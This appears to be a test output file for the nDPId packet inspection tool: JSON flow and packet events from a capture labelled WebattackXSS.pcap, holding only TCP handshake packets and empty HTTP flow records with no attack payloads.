+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1499347364056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347364056,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+jlAAD4Gy5asEAABwKgKMtxQAFCMb5E4AAAAAKACchD4fwAAAgQFtAQCCAoBOmsBAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1499347364056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347364056,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3FBchRpEjG+ROaAScSBCOgAAAgQFtAQCCAoD5Dx3ATprAQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3300,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1499347364057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347364057,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+jpAAD4Gy52sEAABwKgKMtxQAFCMb5E5XIUaRYAQAOXhQAAAAQEICgE6awID5Dx3"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347229416,"flow_last_seen":1499347234681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347229416,"flow_last_seen":1499347234681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347230690,"flow_last_seen":1499347236682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347230690,"flow_last_seen":1499347236682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347233219,"flow_last_seen":1499347238682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347233219,"flow_last_seen":1499347238682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347234469,"flow_last_seen":1499347239682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347234469,"flow_last_seen":1499347239682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347235716,"flow_last_seen":1499347241682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347235716,"flow_last_seen":1499347241682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347238260,"flow_last_seen":1499347243683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347238260,"flow_last_seen":1499347243683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347365320,"flow_last_seen":1499347365320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347365320,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1499347365320,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347365320,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CZFAAD4GvD+sEAABwKgKMtxeAFCYJmWsAAAAAKACchAXCwAAAgQFtAQCCAoBOmw9AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":1499347365320,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347365320,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3F6n4QiemCZlraAScSAl0wAAAgQFtAQCCAoD5D2zATpsPQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":1499347365321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347365321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CZJAAD4GvEasEAABwKgKMtxeAFCYJmWtp+EIn4AQAOXE2QAAAQEICgE6bD4D5D2z"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347366586,"flow_last_seen":1499347366586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347366586,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1499347366586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347366586,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8voxAAD4GB0SsEAABwKgKMtxsAFDi5tP2AAAAAKACchBctQAAAgQFtAQCCAoBOm16AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":2,"flow_last_seen":1499347366586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347366586,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3GzFvqcC4ubT96AScSCt\/gAAAgQFtAQCCAoD5D7wATptegEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1499347366587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347366587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vo1AAD4GB0usEAABwKgKMtxsAFDi5tP3xb6nA4AQAOVNBgAAAQEICgE6bXoD5D7w"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347369077,"flow_last_seen":1499347369077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347369077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1499347369077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347369077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NkNAAD4Gj42sEAABwKgKMtyGAFA0BFmqAAAAAKACchCDWwAAAgQFtAQCCAoBOm\/pAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1499347369077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347369077,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Ib842EVNARZq6AScSDg\/gAAAgQFtAQCCAoD5EFeATpv6QEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1499347369078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347369078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NkRAAD4Gj5SsEAABwKgKMtyGAFA0BFmr\/ONhFoAQAOWABgAAAQEICgE6b+kD5EFe"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347370339,"flow_last_seen":1499347370339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347370339,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1499347370339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347370339,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iG5AAD4GPWKsEAABwKgKMtyUAFBZvPlKAAAAAKACchC8uQAAAgQFtAQCCAoBOnEkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":2,"flow_last_seen":1499347370339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347370339,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3JQ4r3KfWbz5S6AScSDLywAAAgQFtAQCCAoD5EKaATpxJAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":3,"flow_last_seen":1499347370340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347370340,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iG9AAD4GPWmsEAABwKgKMtyUAFBZvPlLOK9yoIAQAOVq0wAAAQEICgE6cSQD5EKa"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3361,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347371602,"flow_last_seen":1499347371602,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347371602,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3361,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1499347371602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347371602,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jiZAAD4GN6qsEAABwKgKMtyiAFAEW\/xGAAAAAKACchAN1QAAAgQFtAQCCAoBOnJgAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3362,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":2,"flow_last_seen":1499347371602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347371602,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3KLBqaHpBFv8R6AScSBjZgAAAgQFtAQCCAoD5EPWATpyYAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":3,"flow_last_seen":1499347371603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347371603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jidAAD4GN7GsEAABwKgKMtyiAFAEW\/xHwamh6oAQAOUCbgAAAQEICgE6cmAD5EPW"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347374136,"flow_last_seen":1499347374136,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374136,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1499347374136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347374136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DktAAD4Gt4WsEAABwKgKMty8AFAnfHqSAAAAAKACchBp1QAAAgQFtAQCCAoBOnTZAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":1499347374136,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347374136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3LxHeFJ\/J3x6k6AScSCGiQAAAgQFtAQCCAoD5EZPATp02QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":1499347374137,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347374137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DkxAAD4Gt4ysEAABwKgKMty8AFAnfHqTR3hSgIAQAOUlkAAAAQEICgE6dNoD5EZP"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347239517,"flow_last_seen":1499347244683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347239517,"flow_last_seen":1499347244683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347240786,"flow_last_seen":1499347246684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347240786,"flow_last_seen":1499347246684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347243333,"flow_last_seen":1499347248684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347243333,"flow_last_seen":1499347248684,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347244580,"flow_last_seen":1499347249685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
